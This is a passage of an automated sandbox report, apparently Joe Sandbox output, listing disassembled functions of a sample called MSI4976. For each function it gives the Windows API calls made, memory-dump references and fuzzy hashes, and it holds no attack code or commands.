                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 8cca65d30f1428dd691b012b1d088fb1f9db6780c082d105115f7f1ea4153ff4
                                        • Instruction ID: cb58f24ac897f5db6b85ee1d2b64a77a6822e512c5414b5dfdd914e22550359c
                                        • Opcode Fuzzy Hash: 8cca65d30f1428dd691b012b1d088fb1f9db6780c082d105115f7f1ea4153ff4
                                        • Instruction Fuzzy Hash: 4A21AE71900388EFDB239F15ECC97A9BBECFB01325F14022AF6519A1E1C3708891CB91
                                        Function 00342E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __calloc_crt.LIBCMT ref: 00342E81
                                        • CreateThread.KERNEL32(?,?,00342FB7,00000000,?,?), ref: 00342EC5
                                        • GetLastError.KERNEL32 ref: 00342ECF
                                        • _free.LIBCMT ref: 00342ED8
                                        • __dosmaperr.LIBCMT ref: 00342EE3
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 2664167353-0
                                        • Opcode ID: 7335740b810bfa012f87cb1eab517e92e9e01c6cfdb2dd1c2f182fa18239ab9b
                                        • Instruction ID: f30e4db70c79ed4fab739a920663d4795595d6abdd96cf662ece7ae7e6d3ec75
                                        • Opcode Fuzzy Hash: 7335740b810bfa012f87cb1eab517e92e9e01c6cfdb2dd1c2f182fa18239ab9b
                                        • Instruction Fuzzy Hash: 7D11C432104706AFDB23AFA59C41DAF7BE8EF45770B510429FA549E191EB31E8418760
                                        Function 0035B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0035B903
                                        • GetLastError.KERNEL32(?,0035B3CB,?,?,?), ref: 0035B90D
                                        • GetProcessHeap.KERNEL32(00000008,?,?,0035B3CB,?,?,?), ref: 0035B91C
                                        • RtlAllocateHeap.NTDLL(00000000,?,0035B3CB), ref: 0035B923
                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0035B93A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 883493501-0
                                        • Opcode ID: 9064be3ae05f9b2e81b342e8269113cfe8f029e0c41b77d927e6b8a2cd727441
                                        • Instruction ID: 31eeebfbdb8023a401f116a0a5066564a107466fe24754a22e799c1d6d1edc38
                                        • Opcode Fuzzy Hash: 9064be3ae05f9b2e81b342e8269113cfe8f029e0c41b77d927e6b8a2cd727441
                                        • Instruction Fuzzy Hash: 2B016975201208BFDF124FA5DC88DAB7BADFF8A765B140029F946C2260DB718C44DA60
                                        Function 00368355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00368371
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0036837F
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00368387
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00368391
                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003683CD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 2816861fe940d3a6c649cf826cc4f53e4376e832254b7c9c688041414c99fddb
                                        • Instruction ID: b72a43e026eac0c6c1e95d16ed37e89a4d16af431b5863fd32fd47d673554f17
                                        • Opcode Fuzzy Hash: 2816861fe940d3a6c649cf826cc4f53e4376e832254b7c9c688041414c99fddb
                                        • Instruction Fuzzy Hash: F2016939D00619DBCF02AFA4EC48AEEBB7CFB0EB01F114541E402B2654CF709550CBA1
                                        Function 0035A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.COMBASE ref: 0035A874
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0035A88F
                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 0035A89D
                                        • CoTaskMemFree.COMBASE(00000000), ref: 0035A8AD
                                        • CLSIDFromString.COMBASE(?,?), ref: 0035A8B9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 8180e05ff0bd0785aa9a076fcf928358d48275d222a3c14a0206556873edb0bd
                                        • Instruction ID: ff5cc4affc0bf01210b7c386c1ed2c93bf69d3c8d14dc05c482361151c6f1e00
                                        • Opcode Fuzzy Hash: 8180e05ff0bd0785aa9a076fcf928358d48275d222a3c14a0206556873edb0bd
                                        • Instruction Fuzzy Hash: A301DF76600604AFDB024F14EC44B9A7FEDEF44352F104024FC02D6220D730DD04ABA1
                                        Function 0035B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0035B7A5
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0035B7AF
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0035B7BE
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0035B7C5
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0035B7DB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: 702e2fe161fce6d608071d68507598eceebcc25f9fcd87f96b38e06f5b61c3a8
                                        • Instruction ID: 283ee80aceea309cc903a3a28f1424aea321ba896699e9192fc5e122b6acb04d
                                        • Opcode Fuzzy Hash: 702e2fe161fce6d608071d68507598eceebcc25f9fcd87f96b38e06f5b61c3a8
                                        • Instruction Fuzzy Hash: 7DF04F752402046FEB125FA5AC89EB77BACFF8B756F104019F942C7560DB609C458A60
                                        Function 0035B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0035B806
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0035B810
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0035B81F
                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0035B826
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0035B83C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: aecaf17714cb951159a7ebc4c8627aebbcf4da0dbb6c67a6a604bcd456bf0cf9
                                        • Instruction ID: 7dfb338c3ca9e338e3b33b6c7b19f551b9f37cf06cb445c2b13366ffa55ec1ba
                                        • Opcode Fuzzy Hash: aecaf17714cb951159a7ebc4c8627aebbcf4da0dbb6c67a6a604bcd456bf0cf9
                                        • Instruction Fuzzy Hash: F3F04975200204AFEB225FA5EC88EAB7B6CFF4B759F000029F942C75A0CB609846CA60
                                        Function 0035FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0035FA8F
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0035FAA6
                                        • MessageBeep.USER32(00000000), ref: 0035FABE
                                        • KillTimer.USER32(?,0000040A), ref: 0035FADA
                                        • EndDialog.USER32(?,00000001), ref: 0035FAF4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: d38086e14cce75f54be7caa155104187cc6f4557f40b7a51eac2eecb389bcf09
                                        • Instruction ID: 560f369ef7ee9e776eaf0dc8f5013b9163d80a774f3e9d7924f9c36ed6ebf8af
                                        • Opcode Fuzzy Hash: d38086e14cce75f54be7caa155104187cc6f4557f40b7a51eac2eecb389bcf09
                                        • Instruction Fuzzy Hash: 1A018130900704AFEB269B14DD4EF9677BCBF05B0AF040169B687A98F0DBF0A9488F51
                                        Function 0033B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndPath.GDI32(?), ref: 0033B526
                                        • StrokeAndFillPath.GDI32(?,?,0039F583,00000000,?), ref: 0033B542
                                        • SelectObject.GDI32(?,00000000), ref: 0033B555
                                        • DeleteObject.GDI32 ref: 0033B568
                                        • StrokePath.GDI32(?), ref: 0033B583
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 3e518eee3c88dd6e957bfa4bac375d481eabd063410a167076778d239e545ef1
                                        • Instruction ID: 8890b3c31e50cfe9fa9002f541f951781a504d47a2132c74f517c1677e21f98b
                                        • Opcode Fuzzy Hash: 3e518eee3c88dd6e957bfa4bac375d481eabd063410a167076778d239e545ef1
                                        • Instruction Fuzzy Hash: E3F0C931100288EBDB279F25ED8C7957FE9A712322F188314E5A6885F0C7348996DF11
                                        Function 0036FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 0036FAB2
                                        • CoCreateInstance.COMBASE(003ADA7C,00000000,00000001,003AD8EC,?), ref: 0036FACA
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • CoUninitialize.COMBASE ref: 0036FD2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        • Opcode ID: 5052a51939134f87063e10bd423169fd80b5f5689fddc91d20cf897d5a4b9dec
                                        • Instruction ID: eaefd9b1728726cf8271e0d6338597f79b3339b178d90fc6e347f60915dcb72f
                                        • Opcode Fuzzy Hash: 5052a51939134f87063e10bd423169fd80b5f5689fddc91d20cf897d5a4b9dec
                                        • Instruction Fuzzy Hash: EDA15B72504301AFD302EF64D891EABB7EDEF88704F40492DF1559B192EB70EA09CB92
                                        Function 0033DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        • Opcode ID: 79c92045f52041236b81cde19384614a2be492e460fc8ad3f0372e277b83ebb3
                                        • Instruction ID: 7f2663cf50a05dfd849c4dad7230c4b6d5e490bdd387f418eb45aaa6ac1189ec
                                        • Opcode Fuzzy Hash: 79c92045f52041236b81cde19384614a2be492e460fc8ad3f0372e277b83ebb3
                                        • Instruction Fuzzy Hash: 0C510E355042568FDF17EF68E481AFABBA4FF2A310F164056F8929B290D7349D47CB20
                                        Function 0036503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003BDC40,?,0000000F,0000000C,00000016,003BDC40,?), ref: 0036507B
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 0032B8A7: _memmove.LIBCMT ref: 0032B8FB
                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003650FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                        • String ID: REMOVE$THIS
                                        • API String ID: 2528338962-776492005
                                        • Opcode ID: 644dd466c60b64dddeb622ea1f246475f68853cbe7196e2d222ef5893f1daa39
                                        • Instruction ID: c86ce9490017f66d0146b319016e0321cf8d4af45161316c834e8a297bdcb18e
                                        • Opcode Fuzzy Hash: 644dd466c60b64dddeb622ea1f246475f68853cbe7196e2d222ef5893f1daa39
                                        • Instruction Fuzzy Hash: 0E419075A00619AFCF06EF64C881AAEB7B9BF49304F04C469E856AF356DB34DD41CB50
                                        Function 0038A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003BDBF0,00000000,?,?,?,?), ref: 0038A4E6
                                        • GetWindowLongW.USER32 ref: 0038A503
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0038A513
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 48d84b47ece7f466de7bea74ed28a0570bc80a6b3d4fbaa9edff423e0745c7d5
                                        • Instruction ID: 21b2ff6d46511ce23e75739856876e7f5827097e40503393055f32165aafea05
                                        • Opcode Fuzzy Hash: 48d84b47ece7f466de7bea74ed28a0570bc80a6b3d4fbaa9edff423e0745c7d5
                                        • Instruction Fuzzy Hash: 2331B231200A05AFEF12AF38CC45BEA7B69EB49324F254715F9B5932E0D770E8509B50
                                        Function 003757D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 003757E7
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0037581D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: ?K7$|
                                        • API String ID: 1413715105-540616914
                                        • Opcode ID: 3e6d5c83ec0e5cd8fef205ce23bb4c68e9ca9eebf65c0910b22576c19a32798f
                                        • Instruction ID: 7541de09d629a3d31f449163c499adc9f5e00f48dd0829f209831a9723bfed9f
                                        • Opcode Fuzzy Hash: 3e6d5c83ec0e5cd8fef205ce23bb4c68e9ca9eebf65c0910b22576c19a32798f
                                        • Instruction Fuzzy Hash: 39313D71901219FBCF16AFA1DC55DEE7FB8FF18300F108019F815AA161DB359A56CBA0
                                        Function 0038A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0038A74F
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0038A75D
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0038A764
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
